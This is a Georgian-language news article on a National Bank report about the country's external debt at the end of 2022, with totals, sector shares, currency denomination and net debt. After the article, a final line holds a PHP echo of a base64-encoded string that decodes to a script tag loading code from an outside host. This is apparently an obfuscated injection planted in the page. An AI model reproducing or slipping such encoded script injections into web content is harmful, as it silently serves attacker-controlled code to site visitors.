celsiusi
ავერსი შნაიდერი

ეროვნული ბანკის მიერ გამოქვეყნებული ანგარიშის თანახმად, საქართველოს მთლიანი საგარეო ვალი 23.5 მილიარდ დოლარს შეადგენს, რაც გასული წლის მთლიანი მშპ-ის 96%-ია.

 

ცენტრალური ბანკის ცნობით, 2022 წლის მეოთხე კვარტალში საქართველოს მთლიანი საგარეო ვალი 1.4 მლრდ აშშ დოლარით გაიზარდა. აქედან, საკურსო ცვლილების გამო ვალი 764.2 მლნ. აშშ დოლარით გაიზარდა, ოპერაციული ცვლილების გამო – 568.1 მლნ. აშშ დოლარით და ფასის ცვლილებების გამო – 66.3 მლნ. აშშ დოლარით; ხოლო სხვა ცვლილებების გამო ვალი 8.7 მლნ. აშშ დოლარით შემცირდა.

 

„სეგმენტების მიხედვით კი საქართველოს საგარეო ვალი ასე ნაწილდება: სახელმწიფო საგარეო ვალმა შეადგინა 10.6 მლრდ აშშ დოლარი (28.7 მლრდ ლარი), რაც მშპ-ს 43.2 პროცენტია. აქედან სამთავრობო სექტორის ვალია 8.1 მლრდ აშშ დოლარი (21.8 მლრდ ლარი; მშპ-ს 32.8 პროცენტი), ეროვნული ბანკის ვალდებულებები – 896.2 მლნ აშშ დოლარი (2.4 მლრდ ლარი; მშპ-ს 3.6 პროცენტი), ხოლო სახელმწიფო საწარმოების ობლიგაციები და სესხები, შესაბამისად, 440.0 მლნ აშშ დოლარი (1.2 მლრდ ლარი; მშპ-ს 1.8 პროცენტი) და 1.2 მლრდ აშშ დოლარი (3.3 მლრდ ლარი; მშპ-ს 5.0 პროცენტი).

 

საბანკო სექტორის საგარეო ვალმა შეადგინა 6.5 მლრდ აშშ დოლარი (17.5 მლრდ ლარი; მშპ-ს 26.4 პროცენტი), სხვა სექტორების საგარეო ვალმა – 4.7 მლრდ აშშ დოლარი (12.6 მლრდ ლარი; მშპ-ს 19.0 პროცენტი) და კომპანიათაშორისო ვალმა – 3.4 მლრდ აშშ დოლარი (9.3 მლრდ ლარი; მშპ-ს 13.9 პროცენტი). მთლიანი საგარეო ვალის 89.3 პროცენტი დენომინირებულია უცხოური ვალუტით. მათ შორის ვალის 50.7 პროცენტი დენომინირებულია აშშ დოლარში, ხოლო 27.1 პროცენტი – ევროში.

 

საქართველოს წმინდა საგარეო ვალმა 2022 წლის 31 დეკემბრის მდგომარეობით 12.5 მლრდ აშშ დოლარი (33.7 მლრდ ლარი) შეადგინა, რაც 2022 წლის მშპ-ს 50.6 პროცენტია. აქედან სახელმწიფო სექტორის წმინდა საგარეო ვალი 5.7 მლრდ აშშ დოლარია (15.5 მლრდ ლარი), რაც მშპ-ს 23.3 პროცენტია.

 

2022 წლის მეოთხე კვარტალში საქართველოს ეროვნული ბანკის საგარეო ვალი 28.0 მლნ აშშ დოლარით გაიზარდა. აქედან საკურსო ცვლილების გამო ვალი 34.5 მლნ. აშშ დოლარით გაიზარდა, ხოლო ოპერაციული ცვლილების გამო ეროვნული ბანკის საგარეო ვალდებულებები 6.5 მლნ აშშ დოლარით შემცირდა. 2022 წლის ბოლოს ეროვნული ბანკის მთლიანმა საგარეო ვალდებულებებმა 896.2 მლნ აშშ დოლარი შეადგინა. აქედან 462.1 მლნ აშშ დოლარი განაწილებული ნასესხობის სპეციალური უფლებაა, რომელსაც არ აქვს დაფარვის ვადა და, პრაქტიკულად, მისი გადახდის ვალდებულება არ დადგება, სანამ საქართველო არის საერთაშორისო სავალუტო ფონდის წევრი“, – აღნიშნულია ანგარიშში.

427
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");